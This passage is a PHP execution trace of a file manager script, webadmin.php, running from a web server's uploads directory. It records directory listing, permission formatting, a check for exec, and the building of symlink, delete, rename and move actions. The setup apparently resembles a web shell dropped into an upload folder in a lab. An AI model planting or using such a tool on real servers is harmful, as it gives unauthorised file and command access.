=> TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
3	203	0	0.011055	800040	listing	1		/var/www/html/uploads/webadmin.php	1214	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	204	0	0.011124	800040	column_title	1		/var/www/html/uploads/webadmin.php	1236	3	'filename'	'filename'	FALSE
5	205	0	0.011141	800040	urlencode	0		/var/www/html/uploads/webadmin.php	1416	1	'/var/www/html/uploads/'
5	205	1	0.011155	800136
5	205	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/webadmin.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/webadmin.php	1418	$arr = ''
4		A						/var/www/html/uploads/webadmin.php	1421	$r = '&amp;reverse=true'
4		A						/var/www/html/uploads/webadmin.php	1422	$arr = ' &and;'
5	206	0	0.011223	800280	word	1		/var/www/html/uploads/webadmin.php	1429	1	'filename'
6	207	0	0.011237	800280	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'Filename'	2	'UTF-8'
6	207	1	0.011253	800552
6	207	R			'Filename'
5	206	1	0.011268	800440
5	206	R			'Filename'
4	204	1	0.011283	800040
4	208	0	0.011290	800040	column_title	1		/var/www/html/uploads/webadmin.php	1237	3	'size'	'filename'	FALSE
5	209	0	0.011305	800040	urlencode	0		/var/www/html/uploads/webadmin.php	1416	1	'/var/www/html/uploads/'
5	209	1	0.011319	800136
5	209	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/webadmin.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/webadmin.php	1418	$arr = ''
4		A						/var/www/html/uploads/webadmin.php	1427	$r = ''
5	210	0	0.011368	800248	word	1		/var/www/html/uploads/webadmin.php	1429	1	'size'
6	211	0	0.011381	800248	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'Size'	2	'UTF-8'
6	211	1	0.011395	800520
6	211	R			'Size'
5	210	1	0.011409	800408
5	210	R			'Size'
4	208	1	0.011433	800152
4	212	0	0.011441	800152	column_title	1		/var/www/html/uploads/webadmin.php	1240	3	'permission'	'filename'	FALSE
5	213	0	0.011456	800152	urlencode	0		/var/www/html/uploads/webadmin.php	1416	1	'/var/www/html/uploads/'
5	213	1	0.011469	800248
5	213	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/webadmin.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/webadmin.php	1418	$arr = ''
4		A						/var/www/html/uploads/webadmin.php	1427	$r = ''
5	214	0	0.011517	800392	word	1		/var/www/html/uploads/webadmin.php	1429	1	'permission'
6	215	0	0.011530	800392	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'Permission'	2	'UTF-8'
6	215	1	0.011545	800664
6	215	R			'Permission'
5	214	1	0.011559	800552
5	214	R			'Permission'
4	212	1	0.011573	800152
4	216	0	0.011580	800152	column_title	1		/var/www/html/uploads/webadmin.php	1241	3	'owner'	'filename'	FALSE
5	217	0	0.011594	800152	urlencode	0		/var/www/html/uploads/webadmin.php	1416	1	'/var/www/html/uploads/'
5	217	1	0.011607	800248
5	217	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/webadmin.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/webadmin.php	1418	$arr = ''
4		A						/var/www/html/uploads/webadmin.php	1427	$r = ''
5	218	0	0.011654	800360	word	1		/var/www/html/uploads/webadmin.php	1429	1	'owner'
6	219	0	0.011667	800360	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'Owner'	2	'UTF-8'
6	219	1	0.011681	800632
6	219	R			'Owner'
5	218	1	0.011695	800520
5	218	R			'Owner'
4	216	1	0.011709	800152
4	220	0	0.011716	800152	column_title	1		/var/www/html/uploads/webadmin.php	1242	3	'group'	'filename'	FALSE
5	221	0	0.011731	800152	urlencode	0		/var/www/html/uploads/webadmin.php	1416	1	'/var/www/html/uploads/'
5	221	1	0.011744	800248
5	221	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/webadmin.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/webadmin.php	1418	$arr = ''
4		A						/var/www/html/uploads/webadmin.php	1427	$r = ''
5	222	0	0.011791	800360	word	1		/var/www/html/uploads/webadmin.php	1429	1	'group'
6	223	0	0.011804	800360	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'Group'	2	'UTF-8'
6	223	1	0.011818	800632
6	223	R			'Group'
5	222	1	0.011831	800520
5	222	R			'Group'
4	220	1	0.011845	800152
4	224	0	0.011852	800152	word	1		/var/www/html/uploads/webadmin.php	1245	1	'functions'
5	225	0	0.011864	800152	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'Functions'	2	'UTF-8'
5	225	1	0.011879	800424
5	225	R			'Functions'
4	224	1	0.011893	800312
4	224	R			'Functions'
3		A						/var/www/html/uploads/webadmin.php	1249	$i = 0
4	226	0	0.011954	800152	sizeof	0		/var/www/html/uploads/webadmin.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	226	1	0.012026	800184
4	226	R			6
3		A						/var/www/html/uploads/webadmin.php	1250	$file = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	227	0	0.012067	800152	date	0		/var/www/html/uploads/webadmin.php	1252	2	'n/j/y H:i:s'	1676243916
4	227	1	0.012146	802544
4	227	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1252	$timestamps = 'mtime: 2/12/23 18:18:36, '
4	228	0	0.012179	802272	date	0		/var/www/html/uploads/webadmin.php	1253	2	'n/j/y H:i:s'	1676243916
4	228	1	0.012210	802600
4	228	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1253	$timestamps .= 'atime: 2/12/23 18:18:36, '
4	229	0	0.012237	802296	date	0		/var/www/html/uploads/webadmin.php	1254	2	'n/j/y H:i:s'	1676243916
4	229	1	0.012267	802624
4	229	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1254	$timestamps .= 'ctime: 2/12/23 18:18:36'
4	230	0	0.012294	802520	html	1		/var/www/html/uploads/webadmin.php	1258	1	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
5	231	0	0.012309	802520	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'	2	NULL
5	231	1	0.012327	802824
5	231	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	230	1	0.012343	802712
4	230	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	232	0	0.012360	802384	urlencode	0		/var/www/html/uploads/webadmin.php	1281	1	'/var/www/html/uploads/.'
4	232	1	0.012373	802480
4	232	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.'
4	233	0	0.012389	802424	html	1		/var/www/html/uploads/webadmin.php	1281	1	'.'
5	234	0	0.012401	802424	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'.'	2	NULL
5	234	1	0.012415	802696
5	234	R			'.'
4	233	1	0.012428	802584
4	233	R			'.'
4	235	0	0.012442	802328	human_filesize	1		/var/www/html/uploads/webadmin.php	1304	1	4096
4		A						/var/www/html/uploads/webadmin.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/webadmin.php	1155	$n = 0
4		A						/var/www/html/uploads/webadmin.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/webadmin.php	1158	$n++
5	236	0	0.012498	802328	strpos	0		/var/www/html/uploads/webadmin.php	1161	2	4	'.'
5	236	1	0.012511	802400
5	236	R			FALSE
5	237	0	0.012525	802328	round	0		/var/www/html/uploads/webadmin.php	1161	2	4	3
5	237	1	0.012537	802400
5	237	R			4
4		A						/var/www/html/uploads/webadmin.php	1161	$filesize = 4
5	238	0	0.012561	802328	strpos	0		/var/www/html/uploads/webadmin.php	1163	2	4	'.'
5	238	1	0.012575	802656
5	238	R			FALSE
5	239	0	0.012589	802328	substr	0		/var/www/html/uploads/webadmin.php	1169	3	'kMGTPE'	0	1
5	239	1	0.012603	802424
5	239	R			'k'
4		A						/var/www/html/uploads/webadmin.php	1169	$suffix = 'k'
4	235	1	0.012628	802360
4	235	R			'4 kB'
3		A						/var/www/html/uploads/webadmin.php	1304	$human = ' title="4 kB"'
4	240	0	0.012654	802368	decoct	0		/var/www/html/uploads/webadmin.php	1315	1	16895
4	240	1	0.012667	802440
4	240	R			'40777'
4	241	0	0.012680	802368	function_exists	0		/var/www/html/uploads/webadmin.php	1317	1	'posix_getuid'
4	241	1	0.012694	802408
4	241	R			TRUE
4	242	0	0.012706	802368	posix_getuid	0		/var/www/html/uploads/webadmin.php	1317	0
4	242	1	0.012719	802368
4	242	R			33
3		A						/var/www/html/uploads/webadmin.php	1317	$l = FALSE
4	243	0	0.012743	802368	permission_octal2string	1		/var/www/html/uploads/webadmin.php	1319	1	16895
4		A						/var/www/html/uploads/webadmin.php	970	$type = 'd'
4		A						/var/www/html/uploads/webadmin.php	979	$owner = 'r'
4		A						/var/www/html/uploads/webadmin.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/webadmin.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/webadmin.php	987	$group = 'r'
4		A						/var/www/html/uploads/webadmin.php	988	$group .= 'w'
4		A						/var/www/html/uploads/webadmin.php	992	$group .= 'x'
4		A						/var/www/html/uploads/webadmin.php	995	$other = 'r'
4		A						/var/www/html/uploads/webadmin.php	996	$other .= 'w'
4		A						/var/www/html/uploads/webadmin.php	1000	$other .= 'x'
4	243	1	0.012863	802408
4	243	R			'drwxrwxrwx'
4	244	0	0.012877	802408	html	1		/var/www/html/uploads/webadmin.php	1319	1	'drwxrwxrwx'
5	245	0	0.012890	802408	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'drwxrwxrwx'	2	NULL
5	245	1	0.012905	802680
5	245	R			'drwxrwxrwx'
4	244	1	0.012919	802568
4	244	R			'drwxrwxrwx'
4	246	0	0.012933	802368	array_key_exists	0		/var/www/html/uploads/webadmin.php	1324	2	'owner_name'	['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	246	1	0.012963	802432
4	246	R			TRUE
4	247	0	0.012976	802368	array_key_exists	0		/var/www/html/uploads/webadmin.php	1330	2	'group_name'	['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	247	1	0.013004	802432
4	247	R			TRUE
4	248	0	0.013018	802464	html	1		/var/www/html/uploads/webadmin.php	1339	1	'/var/www/html/uploads/.'
5	249	0	0.013031	802464	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'/var/www/html/uploads/.'	2	NULL
5	249	1	0.013046	802736
5	249	R			'/var/www/html/uploads/.'
4	248	1	0.013061	802624
4	248	R			'/var/www/html/uploads/.'
3		A						/var/www/html/uploads/webadmin.php	1342	$actions = []
4	250	0	0.013087	802368	function_exists	0		/var/www/html/uploads/webadmin.php	1343	1	'symlink'
4	250	1	0.013100	802408
4	250	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1344	$actions[] = 'create_symlink'
4	251	0	0.013126	802744	dirname	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads/.'
4	251	1	0.013140	802824
4	251	R			'/var/www/html/uploads'
4	252	0	0.013154	802792	is_writable	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads'
4	252	1	0.013176	802832
4	252	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/webadmin.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/webadmin.php	1349	$actions[] = 'move'
4	253	0	0.013222	802744	function_exists	0		/var/www/html/uploads/webadmin.php	1356	1	'exec'
4	253	1	0.013235	802784
4	253	R			TRUE
4	254	0	0.013249	802744	sizeof	0		/var/www/html/uploads/webadmin.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	254	1	0.013265	802776
4	254	R			4
4	255	0	0.013278	802840	str_repeat	0		/var/www/html/uploads/webadmin.php	1363	2	'&nbsp;'	30
4	255	1	0.013292	803128
4	255	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	256	0	0.013309	802808	word	1		/var/www/html/uploads/webadmin.php	1367	1	'create_symlink'
5	257	0	0.013324	802808	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'create symlink'	2	'UTF-8'
5	257	1	0.013339	803080
5	257	R			'create symlink'
4	256	1	0.013354	802968
4	256	R			'create symlink'
4	258	0	0.013369	802800	word	1		/var/www/html/uploads/webadmin.php	1367	1	'delete'
5	259	0	0.013383	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'delete'	2	'UTF-8'
5	259	1	0.013397	803072
5	259	R			'delete'
4	258	1	0.013411	802960
4	258	R			'delete'
4	260	0	0.013425	802800	word	1		/var/www/html/uploads/webadmin.php	1367	1	'rename'
5	261	0	0.013437	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'rename'	2	'UTF-8'
5	261	1	0.013451	803072
5	261	R			'rename'
4	260	1	0.013466	802960
4	260	R			'rename'
4	262	0	0.013480	802792	word	1		/var/www/html/uploads/webadmin.php	1367	1	'move'
5	263	0	0.013497	802792	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'move'	2	'UTF-8'
5	263	1	0.013512	803064
5	263	R			'move'
4	262	1	0.013525	802952
4	262	R			'move'
3		A						/var/www/html/uploads/webadmin.php	1249	$i++
4	264	0	0.013550	802744	sizeof	0		/var/www/html/uploads/webadmin.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	264	1	0.013620	802776
4	264	R			6
3		A						/var/www/html/uploads/webadmin.php	1250	$file = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	265	0	0.013660	802744	date	0		/var/www/html/uploads/webadmin.php	1252	2	'n/j/y H:i:s'	1676243916
4	265	1	0.013692	803072
4	265	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1252	$timestamps = 'mtime: 2/12/23 18:18:36, '
4	266	0	0.013718	802688	date	0		/var/www/html/uploads/webadmin.php	1253	2	'n/j/y H:i:s'	1676243916
4	266	1	0.013749	803016
4	266	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1253	$timestamps .= 'atime: 2/12/23 18:18:36, '
4	267	0	0.013775	802712	date	0		/var/www/html/uploads/webadmin.php	1254	2	'n/j/y H:i:s'	1676243916
4	267	1	0.013805	803040
4	267	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1254	$timestamps .= 'ctime: 2/12/23 18:18:36'
4	268	0	0.013831	802936	html	1		/var/www/html/uploads/webadmin.php	1258	1	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
5	269	0	0.013846	802936	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'	2	NULL
5	269	1	0.013862	803240
5	269	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	268	1	0.013879	803128
4	268	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	270	0	0.013895	802800	urlencode	0		/var/www/html/uploads/webadmin.php	1281	1	'/var/www/html/uploads/..'
4	270	1	0.013909	802896
4	270	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F..'
4	271	0	0.013925	802840	html	1		/var/www/html/uploads/webadmin.php	1281	1	'..'
5	272	0	0.013937	802840	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'..'	2	NULL
5	272	1	0.013951	803112
5	272	R			'..'
4	271	1	0.013965	803000
4	271	R			'..'
4	273	0	0.013979	802744	human_filesize	1		/var/www/html/uploads/webadmin.php	1304	1	4096
4		A						/var/www/html/uploads/webadmin.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/webadmin.php	1155	$n = 0
4		A						/var/www/html/uploads/webadmin.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/webadmin.php	1158	$n++
5	274	0	0.014032	802744	strpos	0		/var/www/html/uploads/webadmin.php	1161	2	4	'.'
5	274	1	0.014045	802816
5	274	R			FALSE
5	275	0	0.014058	802744	round	0		/var/www/html/uploads/webadmin.php	1161	2	4	3
5	275	1	0.014071	802816
5	275	R			4
4		A						/var/www/html/uploads/webadmin.php	1161	$filesize = 4
5	276	0	0.014093	802744	strpos	0		/var/www/html/uploads/webadmin.php	1163	2	4	'.'
5	276	1	0.014107	803072
5	276	R			FALSE
5	277	0	0.014120	802744	substr	0		/var/www/html/uploads/webadmin.php	1169	3	'kMGTPE'	0	1
5	277	1	0.014134	802840
5	277	R			'k'
4		A						/var/www/html/uploads/webadmin.php	1169	$suffix = 'k'
4	273	1	0.014158	802776
4	273	R			'4 kB'
3		A						/var/www/html/uploads/webadmin.php	1304	$human = ' title="4 kB"'
4	278	0	0.014183	802744	decoct	0		/var/www/html/uploads/webadmin.php	1315	1	16895
4	278	1	0.014196	802816
4	278	R			'40777'
4	279	0	0.014209	802744	function_exists	0		/var/www/html/uploads/webadmin.php	1317	1	'posix_getuid'
4	279	1	0.014222	802784
4	279	R			TRUE
4	280	0	0.014235	802744	posix_getuid	0		/var/www/html/uploads/webadmin.php	1317	0
4	280	1	0.014247	802744
4	280	R			33
3		A						/var/www/html/uploads/webadmin.php	1317	$l = FALSE
4	281	0	0.014274	802744	permission_octal2string	1		/var/www/html/uploads/webadmin.php	1319	1	16895
4		A						/var/www/html/uploads/webadmin.php	970	$type = 'd'
4		A						/var/www/html/uploads/webadmin.php	979	$owner = 'r'
4		A						/var/www/html/uploads/webadmin.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/webadmin.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/webadmin.php	987	$group = 'r'
4		A						/var/www/html/uploads/webadmin.php	988	$group .= 'w'
4		A						/var/www/html/uploads/webadmin.php	992	$group .= 'x'
4		A						/var/www/html/uploads/webadmin.php	995	$other = 'r'
4		A						/var/www/html/uploads/webadmin.php	996	$other .= 'w'
4		A						/var/www/html/uploads/webadmin.php	1000	$other .= 'x'
4	281	1	0.014387	802784
4	281	R			'drwxrwxrwx'
4	282	0	0.014401	802784	html	1		/var/www/html/uploads/webadmin.php	1319	1	'drwxrwxrwx'
5	283	0	0.014414	802784	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'drwxrwxrwx'	2	NULL
5	283	1	0.014429	803056
5	283	R			'drwxrwxrwx'
4	282	1	0.014443	802944
4	282	R			'drwxrwxrwx'
4	284	0	0.014457	802744	array_key_exists	0		/var/www/html/uploads/webadmin.php	1324	2	'owner_name'	['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	284	1	0.014487	802808
4	284	R			TRUE
4	285	0	0.014500	802744	array_key_exists	0		/var/www/html/uploads/webadmin.php	1330	2	'group_name'	['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	285	1	0.014528	802808
4	285	R			TRUE
